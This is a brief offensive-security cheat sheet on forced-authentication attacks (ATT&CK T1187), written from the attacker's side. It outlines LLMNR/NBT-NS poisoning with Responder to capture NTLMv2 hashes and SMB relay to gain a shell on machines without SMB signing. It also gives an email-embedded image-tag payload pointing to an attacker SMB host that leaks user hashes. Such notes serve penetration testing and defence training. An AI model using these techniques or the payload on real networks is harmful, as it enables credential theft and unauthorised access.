Forced Authentication (T1187)
If you can't go to the password, make the password come to you.
1. LLMNR / NBT-NS Poisoning
When a computer looks for a hostname PrintSrv but DNS fails (typo), it broadcasts to the local network: "Who is PrintSrv?".
- Tool: Responder.
- Action: You answer "I am PrintSrv!".
- Result: The victim sends you their NTLMv2 Hash.
2. SMB Relay
NTLMv2 hashes cannot be used in Pass-the-Hash. But they can be relayed.
- Requirement: SMB Signing is DISABLED (Default on Workstations).
- Attack:
- Victim connects to You (via LLMNR poisoning).
- You forward the auth request to
Target-PC. Target-PCaccepts it. You get a shell onTarget-PC.
3. Web Source Code
Include an image tag in an email: <img src="file://10.10.10.10/logo.png">.
- When the user opens the email (Outlook), it tries to authenticate to your SMB share. You catch the hash.
